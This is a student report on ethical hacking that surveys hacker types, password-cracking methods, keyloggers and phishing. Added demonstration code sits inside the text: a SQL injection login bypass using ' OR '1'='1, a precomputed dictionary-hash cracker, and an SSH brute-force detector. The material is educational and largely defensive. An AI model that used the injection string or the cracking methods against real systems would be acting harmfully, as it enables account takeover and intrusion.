
Ethical Hacking

Submitted To:
Miss. GURSIMRAT KAUR

Submitted By:
YOGINDER GARG (8636)
NISHANT MUKHIJA (8613)
SUHIRD DANIEL (8677)

RIMT – POLYTECHNIC COLLEGE


Acknowledgement
First and foremost, we would like to express our sincere gratitude to our project guide, MR ANKIT FADIA. We were privileged to experience a sustained, enthusiastic and involved interest from his side. This fueled our enthusiasm even further and encouraged us to boldly step into what was a totally dark and unexplored expanse before us.

We would also like to thank our seniors, who were ready with a positive comment all the time, whether it was an off-hand comment to encourage us or a constructive piece of criticism, and a special thanks to my team members and my mentors in the world of hacking.

Last but not least, we would like to thank the RIMT-POLY staff members and the institute, in general, for extending a helping hand at every juncture of need.

“HACKING” THE STUDY OF EXPLOITATION
“It's not the daily increase but daily decrease. Hack away at the unessential”.

WHAT IS A HACKER?

In common usage, a hacker is a person who breaks into computers, usually by gaining access to administrative controls.

Other uses of the word hacker exist that are not related to computer security (computer programmer and home computer hobbyists), but these are rarely used by the mainstream media. Some would argue that the people that are now considered hackers are not hackers, as before the media described the person who breaks into computers as a hacker there was a hacker community. This community was a community of people who had a large interest in computer programming, often sharing, without restrictions, the source code for the software they wrote.

These people now refer to the cyber-criminal hackers as "crackers".

The subculture that has evolved around hackers is often referred to as the computer underground. Proponents claim to be motivated by artistic and political ends, and are often unconcerned about the use of illegal means to achieve them.

History
Hacking developed alongside "Phone Phreaking", a term referring to the exploration of the phone network without authorization, and there has often been overlap between both technology and participants. Bruce Sterling traces part of the roots of the computer underground to the Yippies, a 1960s counterculture movement which published the Technological Assistance Program (TAP) newsletter.[3] Other sources of early 70s hacker culture can be traced towards more beneficial forms of hacking, including MIT labs or the homebrew club, which later resulted in such things as early personal computers or the open source movement.

Hacker attitudes
Several subgroups of the computer underground with different
attitudes and aims use different terms to demarcate
themselves from each other, or try to exclude some specific
group with which they do not agree. Eric S. Raymond
advocates that members of the computer underground should
be called crackers. Yet, those people see themselves as
hackers and even try to include the views of Raymond in what
they see as one wider hacker culture, a view harshly rejected
by Raymond himself. Instead of a hacker/cracker dichotomy,
they give more emphasis to a spectrum of different categories,
such as white hat (ethical hacking), grey hat, black
hat and script kiddie. In contrast to Raymond, they usually
reserve the term cracker to refer to black hat hackers, or more
generally hackers with unlawful intentions.

Types of hacking:-

• White hat
• Grey hat
• Black hat
• Script kiddie
• Hacktivist

White hat:- A white hat hacker breaks security for non-malicious reasons, for instance testing their own security system. This type of hacker enjoys learning and working with computer systems, and consequently gains a deeper understanding of the subject. Such people normally go on to use their hacking skills in legitimate ways, such as becoming security consultants. The word 'hacker' originally included people like this, although a hacker may not be someone into security.

Grey hat:- A grey hat, in the hacking community, refers to a skilled hacker who sometimes acts illegally, sometimes in good will, and sometimes not. They are a hybrid between white and black hat hackers. They usually do not hack for personal gain or have malicious intentions, but may or may not occasionally commit crimes during the course of their technological exploits.

Black hat:- A black hat is the villain or bad guy, especially in a western movie in which such a character would wear a black hat in contrast to the hero's white hat. The phrase is often used figuratively, especially in computing slang, where it refers to a hacker who breaks into networks or computers, or creates computer viruses.[1]

Script kiddie:- A script kiddie is a non-expert who breaks into computer systems by using pre-packaged automated tools written by others, usually with little understanding. These are the outcasts of the hacker community.

Hacktivist:- A hacktivist is a hacker who utilizes technology to announce a social, ideological, religious, or political message. In general, most hacktivism involves website defacement or denial-of-service attacks. In more extreme cases, hacktivism is used as a tool for cyber terrorism. Hacktivists are also known as Neo Hackers.

Hacktivism (a portmanteau of hack and activism) is "the nonviolent use of illegal or legally ambiguous digital tools in pursuit of political ends. These tools include web site defacements, redirects, denial-of-service attacks, information theft, web site parodies, virtual sit-ins, virtual sabotage, and software development." It is often understood as the writing of code to promote political ideology - promoting expressive politics, free speech, human rights, or information ethics. Acts of hacktivism are carried out in the belief that proper use of code will be able to produce similar results to those produced by regular activism or civil disobedience.

Common methods
• Security exploit
• Password cracking
• Packet sniffer
• Spoofing attack
• Root kit
• Cross site scripting (XSS)
• Trojan horse
• Virus
• Worm
• Key loggers
• Phishing
• SQL injection

Security exploit
A security exploit is a prepared application that takes advantage of a known weakness. Common examples of security exploits are SQL injection, Cross Site Scripting and Cross Site Request Forgery which abuse security holes that may result from substandard programming practice. Other exploits would be able to be used through FTP, HTTP, PHP, SSH, Telnet and some web-pages. These are very common in website/domain hacking.

Password cracking
Password cracking is the process of
recovering passwords from data that has been stored in or
transmitted by a computer system. A common approach is to
repeatedly try guesses for the password.

Packet sniffer
A packet sniffer is an application that captures data packets,
which can be used to capture passwords and other data in
transit over the network.

Spoofing attack
A spoofing attack involves one program, system, or website
successfully masquerading as another by falsifying data and
thereby being treated as a trusted system by a user or another
program. The purpose of this is usually to fool programs,
systems, or users into revealing confidential information, such
as user names and passwords, to the attacker.

Rootkit
A rootkit is designed to conceal the compromise of a
computer's security, and can represent any of a set of
programs which work to subvert control of an operating
system from its legitimate operators. Usually, a rootkit will
obscure its installation and attempt to prevent its removal
through a subversion of standard system security. Rootkits
may include replacements for system binaries so that it
becomes impossible for the legitimate user to detect the
presence of the intruder on the system by looking at process
tables.

Social engineering
Social Engineering is the art of getting persons to reveal
sensitive information about a system. This is usually done by
impersonating someone or by convincing people to believe you
have permissions to obtain such information.

Trojan horse
A Trojan horse is a program which seems to be doing one thing, but is actually doing another. A trojan horse can be used to set up a door in a computer system such that the intruder can gain access later. (The name refers to the horse from the Trojan War, with a conceptually similar function of deceiving defenders into bringing an intruder inside.)

Virus
A virus is a self-replicating program that spreads by inserting copies of itself into other executable code or documents. Therefore, a computer virus behaves in a way similar to a biological virus, which spreads by inserting itself into living cells. While some are harmless or mere hoaxes, most computer viruses are considered malicious.

Worm
Like a virus, a worm is also a self-replicating program. A worm
differs from a virus in that it propagates through computer
networks without user intervention. Unlike a virus, it does not
need to attach itself to an existing program. Many people
conflate the terms "virus" and "worm", using them both to
describe any self-propagating program.

Key loggers
A keylogger is a tool designed to record ('log') every keystroke on an affected machine for later retrieval. Its purpose is usually to allow the user of this tool to gain access to confidential information typed on the affected machine, such as a user's password or other private data. Some key loggers use virus-, trojan-, and rootkit-like methods to remain active and hidden. However, some key loggers are used in legitimate ways and sometimes even to enhance computer security. As an example, a business might have a key logger on a computer used at a point of sale, and data collected by the key logger could be used for catching employee fraud.

Phishing
Phishing is a way of attempting to acquire sensitive information such as usernames, passwords and credit card details by masquerading as a trustworthy entity in an electronic communication. Communications purporting to be from popular social web sites, auction sites, online payment processors or IT administrators are commonly used to lure the unsuspecting public. Phishing is typically carried out by e-mail or instant messaging, and it often directs users to enter details at a fake website whose look and feel are almost identical to the legitimate one. Phishing is an example of social engineering techniques used to fool users, and exploits the poor usability of current web security technologies. Attempts to deal with the growing number of reported phishing incidents include legislation, user training, public awareness, and technical security measures.

A phishing technique was described in detail in 1987, and the first recorded use of the term "phishing" was made in 1996. The term is a variant of fishing, probably influenced by phreaking, and alludes to baits used to "catch" financial information and passwords.

SQL injection
SQL injection is a code injection technique that exploits a security
vulnerability occurring in the database layer of an application. The
vulnerability is present when user input is either incorrectly filtered
for string literal escape characters embedded in SQL statements or
user input is not strongly typed and thereby unexpectedly executed.
It is an instance of a more general class of vulnerabilities that can
occur whenever one programming or scripting language is
embedded inside another. SQL injection attacks are also known as
SQL insertion attacks.
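To make the "incorrectly filtered string literal escape characters" point concrete, here is an added example (not part of the report) that puts the vulnerable query beside its parameterized replacement, using Python's standard sqlite3 module. The users table, its contents, and the injected input are all constructed for the demonstration.

```python
"""Added example: a login query built by string formatting beside its
parameterized replacement, run against an in-memory SQLite database.
The users table, its contents and the inputs are constructed for the demo."""
import sqlite3


def make_db() -> sqlite3.Connection:
    # Constructed sample data; plaintext passwords are for the demo only.
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, password TEXT)")
    conn.executemany(
        "INSERT INTO users VALUES (?, ?)",
        [("alice", "correct horse"), ("bob", "hunter2")],
    )
    return conn


def login_vulnerable(conn: sqlite3.Connection, name: str, password: str) -> list:
    # The input is spliced into the SQL text, so a quote character in it is
    # read as a string-literal delimiter and can change the statement's logic.
    sql = "SELECT name FROM users WHERE name = '%s' AND password = '%s'" % (
        name, password)
    return [row[0] for row in conn.execute(sql)]


def login_parameterized(conn: sqlite3.Connection, name: str, password: str) -> list:
    # Placeholders fix the statement's structure before any value is seen;
    # the driver binds the values separately, so quotes are plain data.
    sql = "SELECT name FROM users WHERE name = ? AND password = ?"
    return [row[0] for row in conn.execute(sql, (name, password))]


# Constructed malicious input: closes the password literal and appends an
# always-true condition, so the WHERE clause matches every row.
INJECTED = "' OR '1'='1"


def demo() -> dict:
    conn = make_db()
    return {
        "vulnerable_normal": login_vulnerable(conn, "alice", "correct horse"),
        "vulnerable_injected": login_vulnerable(conn, "alice", INJECTED),
        "parameterized_normal": login_parameterized(conn, "alice", "correct horse"),
        "parameterized_injected": login_parameterized(conn, "alice", INJECTED),
    }


if __name__ == "__main__":
    for label, rows in demo().items():
        print(f"{label}: {rows}")
```

The vulnerable version returns both users for the injected input because the statement has become `... AND password = '' OR '1'='1'`; the parameterized version returns nothing, since the same characters are bound as a literal password value. Parameterized statements (or a well-vetted ORM that uses them) are the fix; escaping quotes by hand is the weaker, error-prone alternative the passage alludes to.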

PROJECT REPORT
Password Cracking
SOFTWARE CRACKING
Software cracking is the modification of software to remove protection methods. This is a type of reverse engineering. Reverse engineering means studying the design, structure and pattern of a process to understand how things work and modifying them for some other use, mainly personal use. The main reasons for software cracking are:

• Understanding algorithms used in software for use in their own programs.
• Making shareware software full-version.

1. PASSWORD CRACKING
Password cracking is a type of software cracking. Since passwords form one of the foundations of security for most systems and networks, cracking passwords is high on the list of priorities for attackers trying to break into and compromise such systems. Password cracking is the process of recovering secret passwords. The main method of cracking is guessing. So password cracking is the process of guessing the password for an application or system until the correct one is found.

Cracking passwords can be approached in two ways: online cracking and offline cracking.
Online Cracking
This approach involves sniffing the network traffic to capture authentication sessions and trying to extract passwords from the captured information. This is generally slow and difficult to accomplish, but some tools are available that are specially designed for sniffing out passwords from network traffic.
Offline Cracking
This is the preferred method. It involves compromising a system to gain access to the password file or database and then running a tool called a password cracker to try to guess valid passwords for user accounts. Offline cracking can be performed on the compromised machine, or the password file can be grabbed and copied to a machine located outside the compromised network to be cracked at leisure; some worms such as Double Tap and Lion can even automatically grab passwords from infected systems.
Principal attack methods used in password cracking:
There are many methods that are used to crack passwords. Some of them are given below:
• Weak encryption
• Guessing
• Dictionary Attack
• Brute Force Attack
• Hybrid Attack
• Precomputation
• Memorization
• Password Grinding
Weak Encryption

Sometimes a cryptographically weak function is used to store passwords. In most computers, before storing the password in the database the system encrypts the password and stores it somewhere, or it may use some hash function for this. If the system uses some weak function to encrypt the password, the cracker needs only a few operations to decrypt it.
One example of this is the LM hash that Microsoft Windows uses by default to store user passwords that are less than 15 characters in length. The LM hash breaks the password into two 7-character fields which are then hashed separately, allowing each half to be attacked separately.

Guessing

This is the simplest method. Not surprisingly, many people use very weak passwords such as blank, the word 'password', 'passcode' and other words meaning password, the user's name or login name, the names of significant relatives of the user, their birth place or date, pet's name, passport number, etc., and some users neglect to change the default password.
Sometimes it is very easy to crack the password if we have a good idea about the behavior of the user. So by guessing we can easily crack these passwords.

Dictionary Attack

This type of attack uses some password cracking tools (we will discuss these later). The tool is equipped with a dictionary which contains some commonly used passwords, names of places, common names, and other commonly used words. The password cracking tool then encrypts these words using all commonly used encryption methods and then, using some good searching algorithms, checks whether a valid match is found or not.
This is a simple method, and also the commonly used method. It can perform both online and offline cracking.
Brute Force attack
In this method the cracker tries all combinations of letters and digits. This is the simplest and least efficient method, and the most time consuming one. It is used when the dictionary fails. Using letters, digits and special symbols it generates every possible string of every length until the correct one is found or the attacker gives up. The ease with which the password can be cracked varies with different platforms and systems. OSs such as Microsoft Windows Server 2003 store the password securely in encrypted form. To crack such passwords usually requires at the minimum physical access to the system using administrative credentials, and even then brute force is usually the only approach for extracting the password.
User applications such as office productivity tools can protect documents with passwords, and these are generally easier to crack. Older platforms such as Windows 95 stored password information in '.pwl' files that were weakly encrypted and easy to crack. In this approach the feasibility is dependent upon the length of the key, the computational power available for the process, and the patience of the attacker. This is also used in both online and offline cracking.

Hybrid Attack

This is the combination of both Dictionary and Brute force attack. In addition to cracking passwords it is used for guessing community names on a network that uses the Simple Network Management Protocol (SNMP). In a typical hybrid attack the cracking program generates short strings of characters and adds them to the beginning and end of the dictionary words.
E.g.: A password such as “daisy 123” would likely crack very quickly through a hybrid attack, which would try the word “daisy” with various short strings of characters appended.

Precomputation

This involves hashing each word in the dictionary and storing the results in the form of (hash, word) pairs in a way that enables lookup on the cipher text field. This is very useful only when salt is not properly used in the program (salting will be explained later). By applying a time-memory trade-off, a middle ground can be reached: a search space of size N can be turned into an encrypted database of size O(N^(2/3)) in which searching for an encrypted password takes time O(N^(2/3)).

Memorization

This is a method similar to precomputation. It is used to crack multiple passwords at the cost of cracking just one. Since encrypting a word takes much longer than comparing it with a stored word, a lot of effort is saved by encrypting each word only once and comparing it with each of the encrypted passwords using an efficient list searching algorithm.
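The Precomputation and Memorization sections above describe the same economy from two angles: hash each dictionary word once, then resolve any number of stored hashes by lookup. The following added example (not from the report) shows that economy on a constructed five-word dictionary and three constructed users, and then shows what a per-user salt does to it. SHA-256 stands in for whatever hash the system uses, and the hash-call counter is the demo's own instrumentation.

```python
"""Added example: a precomputed hash table against unsalted storage, the
'memorization' saving it gives across many users, and what a per-user salt
does to that saving. The wordlist, the users and their passwords are
constructed for the demo; SHA-256 stands in for whatever hash a system uses."""
import hashlib
import os

# Constructed dictionary of "commonly used" words.
WORDLIST = ["password", "letmein", "daisy123", "qwerty", "dragon"]

HASH_CALLS = 0  # counts attacker-side hash computations


def hash_str(data: str) -> str:
    global HASH_CALLS
    HASH_CALLS += 1
    return hashlib.sha256(data.encode()).hexdigest()


def precompute(wordlist: list) -> dict:
    # Precomputation: hash every dictionary word once and index by digest,
    # so a stored hash is resolved by a single lookup instead of a hash.
    return {hash_str(word): word for word in wordlist}


def crack_salted(salt: str, digest: str, wordlist: list):
    # With a salt the stored digest is H(salt + word); the unsalted table is
    # useless and every candidate must be hashed again for this one user.
    for word in wordlist:
        if hash_str(salt + word) == digest:
            return word
    return None


def demo() -> dict:
    global HASH_CALLS
    users = {"alice": "daisy123", "bob": "dragon", "carol": "Tr0ub4dor&3"}
    unsalted = {u: hash_str(p) for u, p in users.items()}
    salted = {}
    for u, p in users.items():
        salt = os.urandom(8).hex()
        salted[u] = (salt, hash_str(salt + p))

    # Unsalted: build the table once, then resolve every user by lookup.
    HASH_CALLS = 0
    table = precompute(WORDLIST)
    found_unsalted = {u: table.get(d) for u, d in unsalted.items()}
    unsalted_work = HASH_CALLS  # len(WORDLIST), however many users there are

    # Salted: the table finds nothing, and the per-user search cannot be shared.
    salted_in_table = {u: table.get(d) for u, (_, d) in salted.items()}
    HASH_CALLS = 0
    found_salted = {u: crack_salted(s, d, WORDLIST) for u, (s, d) in salted.items()}
    salted_work = HASH_CALLS  # grows with the number of users

    return {
        "found_unsalted": found_unsalted,
        "unsalted_work": unsalted_work,
        "salted_in_table": salted_in_table,
        "found_salted": found_salted,
        "salted_work": salted_work,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(f"{key}: {value}")
```

The work counts are the point. Against unsalted storage the attacker pays one hash per dictionary word no matter how many users are stored; with a salt the table finds nothing and each user costs a fresh pass over the dictionary. The salt does not rescue a weak password (alice and bob still fall), which is why the standard defence pairs a per-user salt with a deliberately slow password hash so that each of those per-user passes is expensive.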

Password grinding

This is manually trying to guess passwords for an application,
system, or network. This is a primitive form of password
cracking in which the attacker simply attempts to log on
repeatedly to the target machine, trying different passwords
until either the correct one is guessed or the system locks out
the attacker. While this might seem like a fruitless activity, it
is amazing how many users employ the word password as their
passwords and how many administrators fail to change or
disable the default passwords included with devices such as
routers they install on their networks. Even considering the
marked exaggeration of hacking abilities depicted in movies
like WarGames and Mission Impossible, a knowledgeable
cracker can occasionally succeed using this simple method and
then leverage the obtained password to further compromise a
target system or network.
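The lockout mentioned above is the defender's half of password grinding. As an added example (not from the report), the logic behind such an alert: count failed logins per source inside a sliding time window and note whether a success followed the burst, which is the case to escalate first. The log lines are constructed syslog-style records modelled on OpenSSH's "Failed password" / "Accepted password" messages; host name, addresses, user names, year and threshold are all demo assumptions.

```python
"""Added example: flag password grinding in authentication logs by counting
failed logins per source inside a sliding time window. The log lines below
are constructed for the demo (syslog-style, modelled on OpenSSH messages)."""
import re
from collections import defaultdict
from datetime import datetime

SAMPLE_LOG = """\
Mar 10 09:00:01 host sshd[1201]: Failed password for admin from 203.0.113.7 port 51000 ssh2
Mar 10 09:00:03 host sshd[1201]: Failed password for admin from 203.0.113.7 port 51001 ssh2
Mar 10 09:00:05 host sshd[1201]: Failed password for root from 203.0.113.7 port 51002 ssh2
Mar 10 09:00:07 host sshd[1201]: Failed password for admin from 203.0.113.7 port 51003 ssh2
Mar 10 09:00:09 host sshd[1201]: Failed password for admin from 203.0.113.7 port 51004 ssh2
Mar 10 09:00:11 host sshd[1201]: Accepted password for admin from 203.0.113.7 port 51005 ssh2
Mar 10 09:15:00 host sshd[1300]: Failed password for alice from 198.51.100.4 port 40000 ssh2
Mar 10 09:15:20 host sshd[1300]: Accepted password for alice from 198.51.100.4 port 40001 ssh2
"""

LINE_RE = re.compile(
    r"^(\w{3} +\d+ \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"(Failed|Accepted) password for (?:invalid user )?(\S+) from (\S+) port"
)


def parse(log: str, year: int = 2024) -> list:
    # Syslog timestamps carry no year, so one is supplied (assumption).
    events = []
    for line in log.splitlines():
        m = LINE_RE.match(line)
        if not m:
            continue
        ts = datetime.strptime(m.group(1), "%b %d %H:%M:%S").replace(year=year)
        events.append((ts, m.group(2), m.group(3), m.group(4)))
    return events


def detect_grinding(events: list, threshold: int = 5, window_s: int = 60) -> list:
    """Return one alert per source that produced >= threshold failures within
    window_s seconds; the alert notes whether a success followed the burst."""
    by_source = defaultdict(list)
    for ts, outcome, user, source in events:
        by_source[source].append((ts, outcome, user))
    alerts = []
    for source, evs in by_source.items():
        evs.sort()
        fails = [ts for ts, outcome, _ in evs if outcome == "Failed"]
        burst_end = None
        for i in range(len(fails) - threshold + 1):  # sliding window over failures
            if (fails[i + threshold - 1] - fails[i]).total_seconds() <= window_s:
                burst_end = fails[i + threshold - 1]
                break
        if burst_end is None:
            continue
        success_after = any(
            outcome == "Accepted" and ts >= burst_end for ts, outcome, _ in evs)
        alerts.append({
            "source": source,
            "failures": len(fails),
            "users": sorted({user for _, _, user in evs}),
            "success_after_burst": success_after,  # the case to escalate first
        })
    return alerts


if __name__ == "__main__":
    for alert in detect_grinding(parse(SAMPLE_LOG)):
        print(alert)
```

On the sample, only 203.0.113.7 is flagged: five failures in eight seconds across two accounts, followed by an accepted login. alice's single mistyped password is below the threshold and produces nothing, which is the balance a lockout or alerting rule has to strike between catching grinding and punishing ordinary users.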

KEYLOGGERS

INTRODUCTION TO KEYLOGGERS
Keystroke logging (often called key logging) is the action of
tracking (or logging) the keys struck on a keyboard, typically
in a covert manner so that the person using the keyboard is
unaware that their actions are being monitored. There are
numerous key logging methods, ranging from hardware and
software-based approaches to electromagnetic and acoustic
analysis.

TYPES OF KEYLOGGERS
Software-based key loggers

(Figure: a log file from a software-based key logger.)

(Figure: screen capture of what the software-based key logger above was logging.)

These are software programs designed to work on the target
computer’s operating system. From a technical perspective
there are five categories:
Hypervisor-based: The key logger can theoretically reside in a
malware hypervisor running underneath the operating system,
which remains untouched. It effectively becomes a virtual
machine. Blue Pill is a conceptual example.
Kernel based: This method is difficult both to write and to
combat. Such key loggers reside at the kernel level and are
thus difficult to detect, especially for user-mode applications.
They are frequently implemented as root kits that subvert the
operating system kernel and gain unauthorized access to the
hardware, making them very powerful. A key logger using this
method can act as a keyboard driver for example, and thus
gain access to any information typed on the keyboard as it
goes to the operating system.

API-based: These keyloggers hook keyboard APIs; the
operating system then notifies the keylogger each time a key
is pressed and the keylogger simply records it. APIs such as
GetAsyncKeyState(), GetForegroundWindow(), etc. are used to
poll the state of the keyboard or to subscribe to keyboard
events.[1] These types of keyloggers are the easiest to write,
but where constant polling of each key is required, they can
cause a noticeable increase in CPU usage, and can also miss
the occasional key. A more recent example simply polls the
BIOS for preboot authentication PINs that have not been
cleared from memory.
Form grabber-based: Form grabber-based keyloggers log web form submissions by recording the web browser's onSubmit event functions. This records form data before it is passed over the internet and so bypasses HTTPS encryption.
Packet analyzers: This involves capturing network traffic
associated with HTTP POST events to retrieve unencrypted
passwords.
Remote access software keyloggers
These are local software keyloggers with an added feature that allows access to the locally recorded data from a remote location. Remote communication may be achieved using one of these methods:
• Data is uploaded to a website, database or an FTP server.
• Data is periodically emailed to a pre-defined email address.
• Data is wirelessly transmitted by means of an attached hardware system.
• The software enables a remote login to the local machine from the Internet or the local network, for data logs stored on the target machine to be accessed.
Related features
Software keyloggers may be augmented with features that capture user information without relying on keyboard key presses as the sole input. Some of these features include:
• Clipboard logging. Anything that has been copied to the clipboard can be captured by the program.
• Screen logging. Screenshots are taken in order to capture graphics-based information. Applications with screen logging abilities may take screenshots of the whole screen, just one application or even just around the mouse cursor. They may take these screenshots periodically or in response to user behaviours (for example, when a user has clicked the mouse). A practical application used by some keyloggers with this screen logging ability is to take small screenshots around where a mouse has just clicked; these defeat web-based keyboards (for example, the web-based screen keyboards that are often used by banks) and any web-based on-screen keyboard without screenshot protection.
• Programmatically capturing the text in a control. The Microsoft Windows API allows programs to request the text 'value' in some controls. This means that some passwords may be captured, even if they are hidden behind password masks (usually asterisks).
• The recording of every program/folder/window opened, including a screenshot of each, and every website visited, also including a screenshot of each.
• The recording of search engine queries, Instant Messenger conversations, FTP downloads and other internet based activities (including the bandwidth used).
• In some advanced software keyloggers, sound can be recorded from a user's microphone and video from a user's webcam.
Hardware-based keyloggers

(Figure: a hardware-based keylogger.)

(Figure: a connected hardware-based keylogger.)

Hardware-based keyloggers do not depend upon any software being installed as they exist at a hardware level in a computer system.
Firmware-based: BIOS-level firmware that handles keyboard
events can be modified to record these events as they are
processed. Physical and/or root-level access is required to the
machine, and the software loaded into the BIOS needs to be
created for the specific hardware that it will be running on.

Keyboard hardware: Hardware keyloggers are used for keystroke logging by means of a hardware circuit that is attached somewhere in between the computer keyboard and the computer, typically inline with the keyboard's cable connector. More stealthy implementations can be installed or built into standard keyboards, so that no device is visible on the external cable. Both types log all keyboard activity to their internal memory, which can be subsequently accessed, for example, by typing in a secret key sequence. A hardware keylogger has an advantage over a software solution: it is not dependent on being installed on the target computer's operating system and therefore will not interfere with any program running on the target machine or be detected by any software. However its physical presence may be detected if, for example, it is installed outside the case as an inline device between the computer and the keyboard. Some of these implementations have the ability to be controlled and monitored remotely by means of a wireless communication standard.
Wireless keyboard sniffers

These passive sniffers collect packets of data being transferred from a wireless keyboard and its receiver. As encryption may be used to secure the wireless communications between the two devices, this may need to be cracked beforehand if the transmissions are to be read.

Keyboard overlays

Criminals have been known to use keyboard overlays on ATMs to capture people's PINs. Each keypress is registered by the keyboard of the ATM as well as the criminal's keypad that is placed over it. The device is designed to look like an integrated part of the machine so that bank customers are unaware of its presence.

Acoustic keyloggers

Acoustic cryptanalysis can be used to monitor the sound created by someone typing on a computer. Each character on the keyboard makes a subtly different acoustic signature when stroked. It is then possible to identify which keystroke signature relates to which keyboard character via statistical methods such as frequency analysis. The repetition frequency of similar acoustic keystroke signatures, the timings between different keyboard strokes and other context information such as the probable language in which the user is writing are used in this analysis to map sounds to letters. A fairly long recording (1000 or more keystrokes) is required so that a big enough sample is collected.

Electromagnetic emissions
It is possible to capture the electromagnetic emissions of a wired keyboard from up to 20 metres (66 ft) away, without being physically wired to it.[7] In 2009, Swiss researchers tested 11 different USB, PS/2 and laptop keyboards in a semi-anechoic chamber and found them all vulnerable, primarily because of the prohibitive cost of adding shielding during manufacture.[8] The researchers used a wide-band receiver to tune into the specific frequency of the emissions radiated from the keyboards.

Various software based key loggers used are:

1. Ardman key logger
2. Award key logger
3. Ecosoft key logger
4. Perfect key logger
5. Family key logger
6. Spy boss key logger

Various hardware based key loggers:

1. key ghost key logger
2. key devil key logger
3. usb key logger

KEY LOGGER USED IN PROJECT FOR DEMO

PHISHING

What is Phishing ?

The term phishing is a general term for the creation and use by
criminals of e-mails and websites – designed to look like they
come from well-known, legitimate and trusted businesses,
financial institutions and government agencies – in an attempt
to gather personal, financial and sensitive information. These
criminals deceive Internet users into disclosing their bank and
financial information or other personal data such as usernames
and passwords, or into unwittingly downloading malicious
computer code onto their computers that can allow the
criminals subsequent access to those computers or the users’
financial accounts.ii
Although phishing, identity theft and identity fraud are terms
that are sometimes used interchangeably, some distinctions
are in order. Phishing is best understood as one of a number of
distinct methods that identity thieves use to “steal”
information through deception – that is, by enticing unwitting
consumers to give out their identifying or
financial information either unknowingly or under false
pretenses, or by deceiving them into allowing criminals
unauthorized access to their computers and personal data. The
United States and some other countries use the term “identity
theft,” and the United Kingdom often uses the term “identity
fraud,” to refer broadly to the practice of obtaining and
misusing others’ identifying information for criminal purposes.
Identity fraud also can be used to refer to the subsequent
criminal use of others’ identifying information to obtain goods
or services, or to the use of fictitious identifying information
(not necessarily associated with a real living person) to commit
a crime.
Phishing is committed so that the criminal may obtain
sensitive and valuable information about a consumer, usually
with the goal of fraudulently obtaining access to the
consumer’s bank or other financial accounts. Often “phishers”
will sell credit card or account numbers to other criminals,
turning a very high profit for a relatively small technological
investment.

How is phishing committed?

In a typical phishing scheme, criminals who want to obtain personal data from people online first create unauthorized
replicas of (or “spoof”) a real website and e-mail, usually from
a financial institution or another company that deals with
financial information, such as an online merchant. The e-mail
will be created in the style of e-mails by a legitimate company
or agency, using its logos and slogans. The nature and format
of the principal website creation language, Hypertext Markup
Language, make it very easy to copy images or even an entire
website. While this ease of website creation is one of the
reasons that the Internet has grown so rapidly as a
communications medium, it also permits the abuse of
trademarks, tradenames, and other corporate identifiers upon
which consumers have come to rely as mechanisms for
authentication.
Phishers typically then send the "spoofed" e-mails to as many
people as possible in an attempt to lure them in to the scheme.
(In some “spear phishing” attacks (see section on “Spear
Phishing” below), phishers have used other illegal means to
obtain personal information about a group of people, then
targeted that specific group with e-mails that include illegally
obtained information to make the e-mails appear more
plausible.) These e-mails redirect consumers to a spoofed
website, appearing to be from that same business or entity.
The criminals know that while not all recipients will have
accounts or other existing relationships with these companies,
some of them will and therefore are more likely to believe the
e-mail and websites to be legitimate. The concept behind many
phishing attacks is similar to that of "pretext" phone calls (i.e.,
phone calls from persons purporting to be with legitimate
institutions or companies asking the call recipients for
personal information). In fact, the criminals behind these e-
mails, websites, and phone calls have no real connection with
those businesses. Their sole purpose is to obtain the
consumers’ personal data to engage in various fraud
schemes.xv
Phishing schemes typically rely on three elements. First,
phishing solicitations often use familiar corporate trademarks
and tradenames, as well as recognized government agency
names and logos. The use of such trademarks is effective in
many cases because they are familiar to many Internet users
and are more likely to be trusted without closer scrutiny by the
users. Moreover, the indicators that are provided for web
browsers to assess the validity and security of a website (e.g.,
the lock icon or the address bar) can all be spoofed. This
problem is further compounded by the lack of standardized
protocols among financial institutions for how they will
communicate with their customers and what information they
will request via the Internet.
Second, the solicitations routinely contain warnings intended
to cause the recipients immediate concern or worry about
access to an existing financial account. Phishing scams
typically create a sense of urgency by warning victims that
their failure to comply with instructions will lead to account
terminations, the assessment of penalties or fees, or other
negative outcomes. The fear that such warnings create helps
to further cloud the ability of consumers to judge whether the
messages are authentic. Even if a small percentage of people
who receive these fraudulent warnings respond, the ease with
which such solicitations can be distributed to millions of
people creates a sizable pool of victims. (It should be noted
that some schemes instead are based on offering positive
incentives, for example by offering the promise of a payment
in return for taking part in an online survey.)
Third, the solicitations rely on two facts pertaining to
authentication of the e-mails: (1) online consumers often lack
the tools and technical knowledge to authenticate messages
from financial institutions and e-commerce companies; and (2)
the available tools and techniques are inadequate for robust
authentication or can be spoofed. Criminals can therefore use
techniques, such as forging of e-mail headers and subject
lines, to make the e-mails appear to come from trusted
sources, knowing that many recipients will have no effective
way to verify the true provenance of the e-mails.

Example – Phishing scam targets Royal Bank Customers

In June 2004, the Royal Bank of Canada notified customers that
fraudulent e-mails purporting to originate from the Royal Bank
were being sent out asking customers to verify account
numbers and personal identification numbers (PINs) through a
link included in the e-mail. The fraudulent e-mail stated that if
the receiver did not click on the link and key in his client card
number and pass code, access to his account would be
blocked. These e-mails were sent within a week of a computer
malfunction that prevented customer accounts from being
updated. The malfunction impacted payroll deposits that were
scheduled to enter many accounts, leaving customers at risk of
missing mortgage, rent and other payments. The Royal Bank
believes it is likely someone tried to take advantage of the
situation.

The impact of phishing:

Phishing has four distinct types of impact, both domestically
and internationally, that are of concern to the commercial and
financial sectors and to law enforcement in both countries:

• Direct Financial Loss. Depending on the type of fraud that a
criminal commits with the aid of stolen identifying data,
consumers and businesses may lose anywhere from a few
hundred dollars to tens of thousands of dollars. Indeed, small
e-commerce businesses may be particularly hard-hit by
identity fraud. For example, because of credit card association
policies, an online merchant who accepts a credit card number
that later proves to have been acquired by identity theft may
be liable for the full amount of the fraudulent transactions
involving that card number.

• Erosion of Public Trust in the Internet. Phishing also
undermines the public’s trust in the Internet. By making
consumers uncertain about the integrity of commercial and
financial websites, and even the Internet’s addressing system,
phishing can make them less likely to use the Internet for
business transactions. People who cannot trust where they are
on the World Wide Web are less likely to use it for legitimate
commerce and communications.xx
This perspective finds support in a 2005 Consumer Reports
survey, which showed declining confidence in the security of
the Internet. Among several findings, the survey found that 9
out of 10 American adult Internet users have made changes to
their Internet habits because of the threat of identity theft,
and of those, 30 percent say that they reduced their overall
usage. Furthermore, 25 percent say they have stopped
shopping online, while 29 percent of those that still shop
